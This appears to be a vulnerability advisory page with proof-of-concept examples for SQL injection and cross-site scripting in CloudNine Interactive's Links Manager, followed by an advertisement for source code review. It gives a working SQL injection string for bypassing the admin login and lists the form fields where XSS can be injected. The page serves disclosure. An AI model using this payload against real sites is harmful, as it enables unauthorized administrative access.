PoC/Exploit for Multiple XSS and SQL Injection in Links Manager

Published Proof of Concept code - Multiple XSS and SQL Injection in Links Manager.

Description
Available
Solution
Not available - check CloudNine Interactive website

1. SQL Injection Example.

URL: http://host/admin.php
username: aaa' union select 123/*
password: 123


2. Cross-Site Scripting Example.

URL: http://host/add_url.php?c=1
Title: [XSS]
Description: [XSS]
Keywords: [XSS]

Order Source Code Review

Prevent hacking by source code audit of a site or web application done by our team.The task will be done by experts in web application security.

Advisories by vuln type